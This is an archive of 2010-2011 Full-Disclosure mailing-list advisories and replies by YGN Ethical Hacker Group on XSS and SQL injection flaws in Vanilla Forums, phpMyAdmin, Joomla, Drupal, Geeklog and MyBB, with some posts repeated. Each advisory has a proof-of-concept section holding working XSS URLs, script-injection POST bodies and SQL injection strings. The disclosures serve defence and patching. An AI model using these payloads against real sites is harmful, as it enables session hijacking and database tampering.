== Vanilla Forums 2.0.16 = Cross Site Scripting Vulnerability == 1. OVERVIEW The Vanilla Forums 2.0.16 and lower versions were vulnerable to Cross Site Scripting. 2. BACKGROUND Vanilla Forums are open-source, standards-compliant, customizable discussion forums. It is specially made to help small communities grow larger through SEO mojo, totally customizable social tools, and great user experience. Vanilla is also built with integration at the forefront, so it can seamlessly integrate with your existing website, blog, or custom-built application. 3. VULNERABILITY DESCRIPTION The 'Target' parameter was not properly sanitized after user logs in, which allows attacker to conduct Cross Site Scripting attack. An attacker could prepare a link in a forum post that includes a link to a file which seems to require authentication. Upon logging in, user will get XSSed. 4. VERSIONS AFFECTED 2.0.16 and lower 5. PROOF-OF-CONCEPT/EXPLOIT http://vanilla/index.php?p=/entry/signinTarget=javascript:alert(document.cookie)//http:// 6. SOLUTION Upgrade to Vanilla Forums 2.0.17 or higher 7. VENDOR Vanilla Forums Development Team http://vanillaforums.org/ 8. CREDIT This vulnerability was discovered by Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar. 9. DISCLOSURE TIME-LINE 2010-12-14: notified vendor 2011-01-18: vendor released fix 2011-01-27: vulnerability disclosed 10. REFERENCES Original Advisory URL: http://yehg.net/lab/pr0js/advisories/[vanilla_forums-2.0.16]_cross_site_scripting What XSS Can Do: http://yehg.net/lab/pr0js/view.php/What%20XSS%20Can%20Do.pdf XSS FAQs: http://www.cgisecurity.com/articles/xss-faq.shtml XSS (wiki): http://en.wikipedia.org/wiki/Cross-site_scripting XSS (owasp): http://www.owasp.org/index.php/Cross-site_Scripting_(XSS) CWE-79: http://cwe.mitre.org/data/definitions/79.html #yehg [2011-01-27] - Best regards, YGN Ethical Hacker Group Yangon, Myanmar http://yehg.net Our Lab | http://yehg.net/lab Our Directory | http://yehg.net/hwd ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Multiple Web Applications | Full Path Disclosure
The following web applications are found to have full path disclosure flaws (Ref: WASC-13, CWE-200). - htmlpurifier-4.2.0 phpids-0.6.5 PhpSecInfo 111WebCalendar-1.2.3 adodb aef-1.0.8 ATutor-2.0 auth b2evolution-3.3.3 bbpress-1.0.2 cftp-r80 claroline-1.9.7 clipbucket_2.0.9_stable_Fr cmsmadesimple-1.9.2 CodeIgniter_1.7.2 concrete5.4.0.5 concrete5.4.1.1 CopperminePhotoGallery-1.5.12 craftysyntax3.0.2 CubeCart-4.4.3 dokuwiki-2009-12-25c Dolphin-7.0.4 dotproject-2.1.4 drupal-7.0 e107_0.7.24 eggblog_4.1.2 elgg-1.7.6 ExoPHPDesk_1.2.1 eyeOS-2.2.0.0 fengoffice_1.7.2 freeway_1_5_alpha_Burstow frontaccounting-2.3.1 helpcenterlive-2.1.7 hesk-2.2 jcow.4.2.1 joomla-1.6.0 kamads-2_b3 kplaylist.1.8.502 lifetype-1.2.10 limesurvey190plus-build9642-20101214 linpha-1.3.4 mambo-4.6.5 mantisbt-1.2.4 moodle-2.0.1 mound-2.1.6 mybb-1.6 nucleus3.61 NuSOAP open-realty-2.5.8 OpenBlog-1.2.1 opencart_v1.4.9.3 opendocman-1.2.6-svn-2011-01-21 orangehrm-2.6.0.2 oscommerce-3.0a5 phorum-5.2.15a PHP-Easy-Survey-Package-2.1.1 PHP-Nuke-8.0 PHP-Point-Of-Sale-10.7 phpads-2.0 phpAlbum_v0.4.1.14.fix06 phpBook-2.1.0 phpcollab-2.5 PHPDevShell-V3.0.0-Beta-4b PHPfileNavigator-2.3.3 phpFormGen-2.09 phpfreechat-1.3 PhpGedView-all-4.2.3 phpicalendar-2.4 phpld-2-151.2.0 phpmyfaq-2.6.13 phprojekt-6.0.5 phpScheduleIt_1.2.12 phpwcms-1.4.7r412 piwigo-2.1.5 piwik-1.1 pixelpost_v1.7.3 pixie_v1.04 PliggCMS1.1.3 podcastgen1.3 prestashop_1.4.0.6 projectpier-0.8.0.3 serendipity-1.5.5 Smarty statusnet-0.9.6 SugarCRM-6.1.0 taskfreak-multi-mysql-0.6 tcexam_11.1.015 textpattern-4.2.0 thebuggenie_2.1.2 theHostingTool-v1.2.3 TinyMCE TinyWebGallery-1.8.3 tomatocart-1.1.3 vanilla-2.0.16 WebCalendar-1.2.3 WeBid-1.0.0 webinsta-mail-list-1.3e WebsiteBaker_2.8.1 wordpress-3.0.4 xajax xoops-2.5.0 YOURS Zend zikula-1.2.4 Vulnerable files list for each application can be found at http://yehg.net/lab/pr0js/advisories/path_disclosure/ http://yehg.net/lab/pr0js/advisories/path_disclosure.zip Solution: Disable php error_display off. For those who manage servers, set php error_display setting as 'on' in php.ini file. For those who don't, simple put php_flag error_display off in .htaccess file of web root directory (unless it is restricted by php_admin_flag) - Best regards, YGN Ethical Hacker Group Yangon, Myanmar http://yehg.net Our Lab | http://yehg.net/lab Our Directory | http://yehg.net/hwd ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] phpMyAdmin 3.4.x, 3.4.0 beta 2 = Stored Cross Site Scripting (XSS) Vulnerability
=== phpMyAdmin 3.4.x, 3.4.0 beta 2 = Stored Cross Site Scripting (XSS) Vulnerability === 1. OVERVIEW The phpMyAdmin web application 3.4.0 beta 2 and lower versions of 3.4.x were vulnerable to Cross Site Scripting. 2. PRODUCT DESCRIPTION phpMyAdmin is a free software tool written in PHP intended to handle the administration of MySQL over the World Wide Web. phpMyAdmin supports a wide range of operations with MySQL. The most frequently used operations are supported by the user interface (managing databases, tables, fields, relations, indexes, users, permissions, etc), while you still have the ability to directly execute any SQL statement. 3. VULNERABILITY DESCRIPTION The 'db' parameter in phpMyAdmin was not sanitized and an attacker can inject XSS string in 'db' field when creating or renaming a database. An attacker can create new database name or rename database name through several means like SQL Injection in user's vulnerable web applications or compromise of user account through brute-force or bypassing CSRF protection. Even though the phpMyAdmin uses httpOnly as a protection against cookie theft via XSS, attacker could use XSS tunneling proxy to manipulate database names and fields. From it, he could execute arbitrary database commands to allow him higher access to the server. 4. VERSIONS AFFECTED phpMyAdmin 3.4.0 beta 2 and lower versions of 3.4.x Vendor confirmed this flaw did not exist before the 3.4 version family. Thus, it is assumed 2.x and 3.3 = versions are not affected. 5. PROOF-OF-CONCEPT/EXPLOIT http://demo.phpmyadmin.net/trunk-config/index.php?db=%27%22--%3E%3C%2Fscript%3E%3Cscript%3Ealert%28%2FXSS%2F%29%3C%2Fscript%3E http://yehg.net/lab/pr0js/advisories/phpmyadmin/3.4.0-b2-xss.jpg 6. IMPACT Attackers can compromise currently logged-in user session, plant xss backdoors and inject arbitrary SQL statements (CREATE,INSERT,UPDATE,DELETE) via crafted XSS payloads. 7. SOLUTION For those who're using version phpMyAdmin 3.4.0 beta 2 and lower, check out the latest commit (git pull). 8. VENDOR phpMyAdmin (http://www.phpmyadmin.net) 9. CREDIT This vulnerability was discovered by Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar. 10. DISCLOSURE TIME-LINE 2011-01-26: notified vendor 2011-01-26: vendor released fix 2011-01-27: vulnerability disclosed 11. REFERENCES Vendor Commit: http://phpmyadmin.git.sourceforge.net/git/gitweb.cgi?p=phpmyadmin/phpmyadmin;a=commit;h=f57daa0a59a0058a4b3be1bbdf1577b59d7d697a Original Advisory URL: http://yehg.net/lab/pr0js/advisories/phpmyadmin/[phpmyadmin-3.4.0-beta2]_cross_site_scripting(XSS) CWE-79: http://cwe.mitre.org/data/definitions/79.html Previous Releases: http://www.phpmyadmin.net/home_page/security/PMASA-2010-6.php http://www.phpmyadmin.net/home_page/security/PMASA-2010-5.php http://www.phpmyadmin.net/home_page/security/PMASA-2008-5.php http://www.phpmyadmin.net/home_page/security/PMASA-2008-6.php #yehg [2011-01-27] - Best regards, YGN Ethical Hacker Group Yangon, Myanmar http://yehg.net Our Lab | http://yehg.net/lab Our Directory | http://yehg.net/hwd ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Joomla! 1.0.x ~ 1.0.15 | Cross Site Scripting (XSS) Vulnerability
Niels Braczek From Germany Joomla! Community has released a patch: http://www.joomlaportal.de/sicherheit/241658-joomla-1-0-x-1-0-15-cross-site-scripting-xss-vulnerability.html It uses the same Joomla! filtering function and thus it's supposed to safe. For your convenience, download the patched file from http://yehg.net/lab/pr0js/advisories/joomla/core/patched_com_search.zip 5368aa00b2d4746e025baa030babc888 Updated advisory. == Joomla! 1.0.x ~ 1.0.15 | Cross Site Scripting (XSS) Vulnerability == 1. OVERVIEW The Joomla! 1.0.x series are currently vulnerable to Cross Site Scripting. CVE ID, CVE-2011-0005, has been assigned for it. 2. BACKGROUND Joomla! is a free and open source content management system (CMS) for publishing content on the World Wide Web and intranets. 3. VULNERABILITY DESCRIPTION The ordering parameter in a core module,com_search, is not properly sanitized and thus vulnerable to XSS. By leveraging this vulnerability, attackers can compromise currently logged-in user/administrator session and impersonate arbitrary user actions available under /administrator/ functions. As the vulnerability is based on the core module, it affects both classic and customized Joomla! 1.0.x based web sites. 4. VERSIONS AFFECTED Joomla! 1.0.x ~ 1.0.15 series 5. PROOF-OF-CONCEPT/EXPLOIT http://attacker.in/joomla1015/index.php?option=com_searchsearchword=xsssearchphrase=anyordering=newest%22%20onmousemove=alert%28document.cookie%29%20style=position:fixed;top:0;left:0;width:100%;height:100%;%22 6. SOLUTION Joomla 1.0.x series has been at end of life since 2009-07-22. Upgrade to Joomla! 1.5.x family (1.5.22 as of 2011-01-06) Apply the third-party patch: http://www.joomlaportal.de/sicherheit/241658-joomla-1-0-x-1-0-15-cross-site-scripting-xss-vulnerability.html 7. VENDOR Joomla! Developer Team http://www.joomla.org 8. CREDIT This vulnerability was discovered by Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar. 9. DISCLOSURE TIME-LINE 2011-01-03: notified Joomla! Security Strike Team regardless of EOL status 2011-01-06: vulnerability disclosed 2011-01-07: vendor confirmed that they would not release patch 10. VENDOR RESPONSE While noted, your exploit report does not fall within the JSST remit as we no longer support J1.0.x branch (as you are aware and indicate). The vulnerability mentioned is not known to exist in any current supported release. Please ensure you are using the latest version of Joomla! 11. REFERENCES Original Advisory URL: http://yehg.net/lab/pr0js/advisories/joomla/core/[joomla_1.0.x~15]_cross_site_scripting Patched File: http://yehg.net/lab/pr0js/advisories/joomla/core/patched_com_search.zip Joomla! 1.0.x End of Life - http://community.joomla.org/blogs/community/509-an-old-friend-comes-of-age.html OWASP Top 10: http://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project CWE-79: http://cwe.mitre.org/data/definitions/79.html #yehg [2011-01-06] #updated - 2011-01-14 - added patched link #updated - 2011-01-07 - added VENDOR RESPONSE, CVE ID ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Joomla! 1.0.x ~ 1.0.15 | Cross Site Scripting (XSS) Vulnerability
Niels Braczek From Germany Joomla! Community has released a patch: http://www.joomlaportal.de/sicherheit/241658-joomla-1-0-x-1-0-15-cross-site-scripting-xss-vulnerability.html It uses the same Joomla! filtering function and thus it's supposed to safe. For your convenience, download the patched file from http://yehg.net/lab/pr0js/advisories/joomla/core/patched_com_search.zip 5368aa00b2d4746e025baa030babc888 Updated advisory. == Joomla! 1.0.x ~ 1.0.15 | Cross Site Scripting (XSS) Vulnerability == 1. OVERVIEW The Joomla! 1.0.x series are currently vulnerable to Cross Site Scripting. CVE ID, CVE-2011-0005, has been assigned for it. 2. BACKGROUND Joomla! is a free and open source content management system (CMS) for publishing content on the World Wide Web and intranets. 3. VULNERABILITY DESCRIPTION The ordering parameter in a core module,com_search, is not properly sanitized and thus vulnerable to XSS. By leveraging this vulnerability, attackers can compromise currently logged-in user/administrator session and impersonate arbitrary user actions available under /administrator/ functions. As the vulnerability is based on the core module, it affects both classic and customized Joomla! 1.0.x based web sites. 4. VERSIONS AFFECTED Joomla! 1.0.x ~ 1.0.15 series 5. PROOF-OF-CONCEPT/EXPLOIT http://attacker.in/joomla1015/index.php?option=com_searchsearchword=xsssearchphrase=anyordering=newest%22%20onmousemove=alert%28document.cookie%29%20style=position:fixed;top:0;left:0;width:100%;height:100%;%22 6. SOLUTION Joomla 1.0.x series has been at end of life since 2009-07-22. Upgrade to Joomla! 1.5.x family (1.5.22 as of 2011-01-06) Apply the third-party patch: http://www.joomlaportal.de/sicherheit/241658-joomla-1-0-x-1-0-15-cross-site-scripting-xss-vulnerability.html 7. VENDOR Joomla! Developer Team http://www.joomla.org 8. CREDIT This vulnerability was discovered by Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar. 9. DISCLOSURE TIME-LINE 2011-01-03: notified Joomla! Security Strike Team regardless of EOL status 2011-01-06: vulnerability disclosed 2011-01-07: vendor confirmed that they would not release patch 10. VENDOR RESPONSE While noted, your exploit report does not fall within the JSST remit as we no longer support J1.0.x branch (as you are aware and indicate). The vulnerability mentioned is not known to exist in any current supported release. Please ensure you are using the latest version of Joomla! 11. REFERENCES Original Advisory URL: http://yehg.net/lab/pr0js/advisories/joomla/core/[joomla_1.0.x~15]_cross_site_scripting Patched File: http://yehg.net/lab/pr0js/advisories/joomla/core/patched_com_search.zip Joomla! 1.0.x End of Life - http://community.joomla.org/blogs/community/509-an-old-friend-comes-of-age.html OWASP Top 10: http://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project CWE-79: http://cwe.mitre.org/data/definitions/79.html #yehg [2011-01-06] #updated - 2011-01-14 - added patched link #updated - 2011-01-07 - added VENDOR RESPONSE, CVE ID ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Drupal 5.x, 6.x = Stored Cross Site Scripting Vulnerability
== Drupal 5.x, 6.x = Stored Cross Site Scripting Vulnerability == 1. OVERVIEW Drupal 5.x and 6.x are currently vulnerable to Stored Cross Site Scripting. 2. BACKGROUND Drupal is a free software package that allows anyone to easily publish, manage and organize a wide variety of content on a website. Hundreds of thousands of people and organizations are using Drupal to power an endless variety of sites. 3. VULNERABILITY DESCRIPTION The 'site_footer', 'name', 'explanation' parameters are not properly sanitized in administration backend of Drupal 5.x and 6.x versions, which could allow attackers to conduct stored cross site scripting attacks. 4. VERSIONS AFFECTED The vulnerability was tested in Drupal version 5.23 and 6.20, currently latest versions of 5.x and 6.x families. The recent released version Drupal 7 seems to be not vulnerable. 5. PROOF-OF-CONCEPT/EXPLOIT = XSS in Footer (parameter: site_footer, module: system, url: admin/settings/site-information) The 'site_footer' parameter is not properly sanitized at site information page (admin/settings/site-information) and XSS payload can be set as footer text. XSS will execute after Administration theme (url: admin/settings/admin) is set to Marvin, and Chamelon. = XSS in Role (parameter: name, module: role, url: admin/user/roles) The 'name' parameter is not properly sanitized and XSS payload can be set as a role name. This will affect in administration pages as well as user registration page if the role is set to be shown. = XSS in Profile (parameter: explanation, module: profile, url: admin/user/profile) The 'explanation' parameter is not properly sanitized when adding new * single-line textfield * multi-line textfield * checkbox * list selection * freeform list * URL * date XSS can be executed in user registration page, user profile, and member list pages if it is set to be visible. See: http://attacker.in/drupal6/ http://attacker.in/drupal6/user/register http://attacker.in/drupal6/user/[ID]/edit/xss 6. IMPACT This XSS attack can be directly conducted on drupal sites where anti-csrf form_token check is disabled. If it is enabled, attacker must find ways to bypass anti-csrf token using revolutionary or traditional methods. After compromising it, attackers can plant persistent XSS backdoors in user registration page,user profile page, member list pages, user roles and profile settings pages of administration backend. 7. SOLUTION Upgrade to Drupal 7. Lock down access to administration backend. Disable Full HTML formatting for sites that allow public user registration. 8. VENDOR Drupal Development Team http://drupal.org 9. CREDIT This vulnerability was discovered by Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar. 10. DISCLOSURE TIME-LINE 2010-12-30: notified vendor 2010-12-31: vendor replied 'not considered as vulnerabilities' 2011-01-14: vulnerability disclosed 11. VENDOR RESPONSE The issues you report are not considered security vulnerabilities since advanced permissions (which in and of themselves would allow malicious users to take over a site) are required in order to exploit them. For the issues you reported, administer site configuration is required to edit the site footer message, and administer users is required to add/edit role names and profile fields. See the section What About Vulnerabilities Which Require Advanced Permissions? in http://drupal.org/security-advisory-policy for additional information. 12. REFERENCES Original Advisory URL: http://yehg.net/lab/pr0js/advisories/ About Drupal: http://drupal.org/about Drupal Security Policy: http://drupal.org/security-advisory-policy Disabling Form Token Check: http://data.agaric.com/node/2343 Anti-CSRF measures and XSS: http://nileshkumar83.blogspot.com/2010/07/anti-csrf-measures-and-xss.html Bypassing CSRF protections: http://blog.andlabs.org/2010/03/bypassing-csrf-protections-with.html Defeating Anti-CSRF XSS: http://stephensclafani.com/2009/05/26/exploiting-unexploitable-xss/ Defeating Anti-CSRF XSS: http://kuza55.blogspot.com/2008/02/exploiting-csrf-protected-xss.html #yehg [2011-01-14] - Best regards, YGN Ethical Hacker Group Yangon, Myanmar http://yehg.net Our Lab | http://yehg.net/lab Our Directory | http://yehg.net/hwd ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Drupal 5.x, 6.x = Stored Cross Site Scripting Vulnerability
== Drupal 5.x, 6.x = Stored Cross Site Scripting Vulnerability == 1. OVERVIEW Drupal 5.x and 6.x are currently vulnerable to Stored Cross Site Scripting. 2. BACKGROUND Drupal is a free software package that allows anyone to easily publish, manage and organize a wide variety of content on a website. Hundreds of thousands of people and organizations are using Drupal to power an endless variety of sites. 3. VULNERABILITY DESCRIPTION The 'site_footer', 'name', 'explanation' parameters are not properly sanitized in administration backend of Drupal 5.x and 6.x versions, which could allow attackers to conduct stored cross site scripting attacks. 4. VERSIONS AFFECTED The vulnerability was tested in Drupal version 5.23 and 6.20, currently latest versions of 5.x and 6.x families. The recent released version Drupal 7 is not vulnerable. 5. PROOF-OF-CONCEPT/EXPLOIT = XSS in Footer (parameter: site_footer, module: system, url: admin/settings/site-information) The 'site_footer' parameter is not properly sanitized at site information page (admin/settings/site-information) and XSS payload can be set as footer text. XSS will execute after Administration theme (url: admin/settings/admin) is set to Marvin, and Chamelon. = XSS in Role (parameter: name, module: role, url: admin/user/roles) The 'name' parameter is not properly sanitized and XSS payload can be set as a role name. This will affect in administration pages as well as user registration page if the role is set to be shown. = XSS in Profile (parameter: explanation, module: profile, url: admin/user/profile) The 'explanation' parameter is not properly sanitized when adding new * single-line textfield * multi-line textfield * checkbox * list selection * freeform list * URL * date XSS can be executed in user registration page, user profile, and member list pages if it is set to be visible. See: http://attacker.in/drupal6/ http://attacker.in/drupal6/user/register http://attacker.in/drupal6/user/[ID]/edit/xss 6. IMPACT This XSS attack can be directly conducted on drupal sites where anti-csrf form_token check is disabled. If it is enabled, attacker must find ways to bypass anti-csrf token using revolutionary or traditional methods. After compromising it, attackers can plant persistent XSS backdoors in user registration page,user profile page, member list pages, user roles and profile settings pages of administration backend. 7. SOLUTION Upgrade to Drupal 7. Lock down access to administration backend. Disable Full HTML formatting for sites that allow public user registration. 8. VENDOR Drupal Development Team http://drupal.org 9. CREDIT This vulnerability was discovered by Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar. 10. DISCLOSURE TIME-LINE 2010-12-30: notified vendor 2010-12-31: vendor replied 'not considered as vulnerabilities' 2011-01-14: vulnerability disclosed 11. VENDOR RESPONSE The issues you report are not considered security vulnerabilities since advanced permissions (which in and of themselves would allow malicious users to take over a site) are required in order to exploit them. For the issues you reported, administer site configuration is required to edit the site footer message, and administer users is required to add/edit role names and profile fields. See the section What About Vulnerabilities Which Require Advanced Permissions? in http://drupal.org/security-advisory-policy for additional information. 12. REFERENCES Original Advisory URL: http://yehg.net/lab/pr0js/advisories/[drupal.5.x,6x]_cross_site_scripting About Drupal: http://drupal.org/about Drupal Security Policy: http://drupal.org/security-advisory-policy Disabling Form Token Check: http://data.agaric.com/node/2343 Anti-CSRF measures and XSS: http://nileshkumar83.blogspot.com/2010/07/anti-csrf-measures-and-xss.html Bypassing CSRF protections: http://blog.andlabs.org/2010/03/bypassing-csrf-protections-with.html Defeating Anti-CSRF XSS: http://stephensclafani.com/2009/05/26/exploiting-unexploitable-xss/ Defeating Anti-CSRF XSS: http://kuza55.blogspot.com/2008/02/exploiting-csrf-protected-xss.html #yehg [2011-01-14] ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Drupal 5.x, 6.x = Stored Cross Site Scripting Vulnerability
On Fri, Jan 14, 2011 at 4:28 AM, Justin Klein Keane jus...@madirish.net wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Drupal security has been aware of this issue for quite some time now. But basically, as their response indicates, you need admin access to exploit these issues. However, if you have admin access you can execute PHP and basically do anything you want. Your vulnerability hinges on being able to bypass the CSRF security in place in Drupal. Seems like a bit of a stretch to release this as an advisory. Why not include the fact that if you can bypass the CSRF detection you can also execute arbitrary code with the privileges of the web server? If you 0wn a server, you 0wn one machine If you 0wn clients, you 0wn thousands of machine. http://cyberinsecure.com/?s=iframe ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Joomla! 1.0.x ~ 1.0.15 | Cross Site Scripting (XSS) Vulnerability
Joomla! Security Team has confirmed that this issue will not be fixed. While noted, your exploit report does not fall within the JSST remit as we no longer support J1.0.x branch (as you are aware and indicate). The vulnerability mentioned is not known to exist in any current supported release. Please ensure you are using the latest version of Joomla! The advisory has been updated with vendor's response: http://yehg.net/lab/pr0js/advisories/joomla/core/%5Bjoomla_1.0.x~15%5D_cross_site_scripting The CVE ID, CVE-2011-0005, has been assigned for it. - Best regards, YGN Ethical Hacker Group Yangon, Myanmar http://yehg.net Our Lab | http://yehg.net/lab Our Directory | http://yehg.net/hwd ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Joomla! 1.0.x ~ 1.0.15 | Cross Site Scripting (XSS) Vulnerability
== Joomla! 1.0.x ~ 1.0.15 | Cross Site Scripting (XSS) Vulnerability == 1. OVERVIEW The Joomla! 1.0.x series are currently vulnerable to Cross Site Scripting. 2. BACKGROUND Joomla! is a free and open source content management system (CMS) for publishing content on the World Wide Web and intranets. 3. VULNERABILITY DESCRIPTION The ordering parameter in a core module,com_search, is not properly sanitized and thus vulnerable to XSS. By leveraging this vulnerability, attackers can compromise currently logged-in user/administrator session and impersonate arbitrary user actions available under /administrator/ functions. As the vulnerability is based on the core module, it affects both classic and customized Joomla! 1.0.x based web sites. 4. VERSIONS AFFECTED Joomla! 1.0.x ~ 1.0.15 series 5. PROOF-OF-CONCEPT/EXPLOIT http://attacker.in/joomla1015/index.php?option=com_searchsearchword=xsssearchphrase=anyordering=newest%22%20onmousemove=alert%28document.cookie%29%20style=position:fixed;top:0;left:0;width:100%;height:100%;%22 6. SOLUTION Joomla 1.0.x series has been at end of life since 2009-07-22. Upgrade to Joomla! 1.5.x family (1.5.22 as of 2011-01-05) 7. VENDOR Joomla! Developer Team http://www.joomla.org 8. CREDIT This vulnerability was discovered by Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar. 9. DISCLOSURE TIME-LINE 2011-01-03: notified Joomla! Security Strike Team regardless of EOL status 2011-01-06: vulnerability disclosed 10. REFERENCES Original Advisory URL: http://yehg.net/lab/pr0js/advisories/joomla/core/[joomla_1.0.x~15]_cross_site_scripting Joomla! 1.0.x End of Life - http://community.joomla.org/blogs/community/509-an-old-friend-comes-of-age.html OWASP Top 10: http://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project CWE-79: http://cwe.mitre.org/data/definitions/79.html #yehg [2011-01-06] - Best regards, YGN Ethical Hacker Group Yangon, Myanmar http://yehg.net Our Lab | http://yehg.net/lab Our Directory | http://yehg.net/hwd ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Geeklog 1.7.1 = Cross Site Scripting Vulnerability
== Geeklog 1.7.1 = Cross Site Scripting Vulnerability == 1. OVERVIEW The Geeklog was vulnerable to Cross Site Scripting in its administration backend. 2. BACKGROUND Geeklog is a PHP/MySQL based application for managing dynamic web content. Out of the box, it is a blog engine, or a CMS with support for comments, trackbacks, multiple syndication formats, spam protection, and all the other vital features of such a system. 3. VULNERABILITY DESCRIPTION User supplied input is not probably sanitized in the subgroup and conf_group parameters when the configuration settings are saved in /admin/configuration.php. Attackers who manage to get/bypass anti-csrf token (_glsectoken) via other means can effectively perform XSS against admin users. 4. VERSIONS AFFECTED 1.7.1 and lower 5. PROOF-OF-CONCEPT/EXPLOIT [Request] POST /geeklog/admin/configuration.php HTTP/1.1 _glsectoken=conf_group=Core'--/scriptscriptalert(/XSS/)/scriptsubgroup='--/scriptscriptalert(/XSS/)/script [/Request] 6. SOLUTION Upgrade to 1.7.1sr1 7. VENDOR Geeklog Development Team http://www.geeklog.net/ 8. CREDIT This vulnerability was discovered by Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar. 9. DISCLOSURE TIME-LINE 2010-12-31: notified vendor 2011-01-02: vendor released fixed version 2011-01-04: vulnerability disclosed 10. REFERENCES Original Advisory URL: http://yehg.net/lab/pr0js/advisories/[geeklog1.7.1]_cross_site_scripting Vendor Advisory: http://www.geeklog.net/article.php/geeklog-1.7.1sr1 About Geeklog: http://www.geeklog.net/docs/english/#introduction http://stephensclafani.com/2009/05/26/exploiting-unexploitable-xss/ http://kuza55.blogspot.com/2008/02/exploiting-csrf-protected-xss.html #yehg [2011-01-04] - Best regards, YGN Ethical Hacker Group Yangon, Myanmar http://yehg.net Our Lab | http://yehg.net/lab Our Directory | http://yehg.net/hwd ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] MyBB 1.6 = SQL Injection Vulnerability
= MyBB 1.6 = SQL Injection Vulnerability = 1. OVERVIEW Potential SQL Injection vulnerability was detected in MyBB. 2. APPLICATION DESCRIPTION MyBB is a free bulletin board system software package developed by the MyBB Group. It's supposed to be developed from XMB and DevBB bulletin board applications. 3. VULNERABILITY DESCRIPTION The keywords parameter was not properly sanitized in /private.php and /search.php which leads to SQL Injection vulnerability. Full exploitation possibility is probably mitigated by clean_keywords and clean_keywords_ft functions in inc/functions_search.php. 4. VERSIONS AFFECTED MyBB 1.6 and lower 5. PROOF-OF-CONCEPT/EXPLOIT = /search.php POST /mybb/search.php action=do_searchforums=2keywords='+or+'a'+'apostthread=1 = /private.php POST /mybb/private.php my_post_key=keywords='+or+'a'+'aquick_search=Search+PMsallbox=Check+Allfromfid=0fid=4jumpto=4action=do_stuff 6. SOLUTION Upgrade to 1.6.1 7. VENDOR MyBB Development Team http://www.mybb.com/ 8. CREDIT This vulnerability was discovered by Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar. 9. DISCLOSURE TIME-LINE 2010-12-09: notified vendor 2010-12-15: vendor released fixed version 2010-12-24: vulnerability disclosed 10. REFERENCES Original Advisory URL: http://yehg.net/lab/pr0js/advisories/[mybb1.6]_sql_injection About MyBB: http://www.mybb.com/about/mybb #yehg [2010-12-24] - Best regards, YGN Ethical Hacker Group Yangon, Myanmar http://yehg.net Our Lab | http://yehg.net/lab Our Directory | http://yehg.net/hwd ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] MyBB 1.6 = Cross Site Scripting (XSS) Vulnerability
MyBB 1.6 = Cross Site Scripting (XSS) Vulnerability 1. OVERVIEW MyBB was vulnerable to Cross Site Scripting Vulnerability. 2. APPLICATION DESCRIPTION MyBB is a free bulletin board system software package developed by the MyBB Group. It's supposed to be developed from XMB and DevBB bulletin board applications. 3. VULNERABILITY DESCRIPTION Two XSS vulnerabilities were found. One is user-driven XSS on url parameter. User will get xssed upon successful log-in. The other is a reflected XSS on posthash parameter where the valid tid (topic id) is required for successful attack. The anti-CSRF check against my_post_key parameter was not done in thread/post preview mode and thus there came a way for XSS to be successful. 4. VERSIONS AFFECTED MyBB 1.6 and lower 5. PROOF-OF-CONCEPT/EXPLOIT User-driven XSS http://attacker.in/mybb/member.php?action=loginurl=javascript:alert%28/XSS/%29 Reflected XSS http://attacker.in/mybb/newreply.php?my_post_key=subject=XSSaction=do_newreplyposthash=;scriptalert(/XSS/)/scriptquoted_ids=lastpid=1from_page=1tid=1method=quickreplymessage=testpreviewpost=Preview Post 6. SOLUTION Upgrade to 1.6.1 7. VENDOR MyBB Development Team http://www.mybb.com/ 8. CREDIT This vulnerability was discovered by Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar. 9. DISCLOSURE TIME-LINE 2010-12-09: notified vendor 2010-12-15: vendor released fixed version 2010-12-20: vulnerability disclosed 10. REFERENCES Original Advisory URL: http://yehg.net/lab/pr0js/advisories/[mybb1.6]_cross_site_scripting About MyBB: http://www.mybb.com/about/mybb #yehg [2010-12-20] - Best regards, YGN Ethical Hacker Group Yangon, Myanmar http://yehg.net Our Lab | http://yehg.net/lab Our Directory | http://yehg.net/hwd ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - 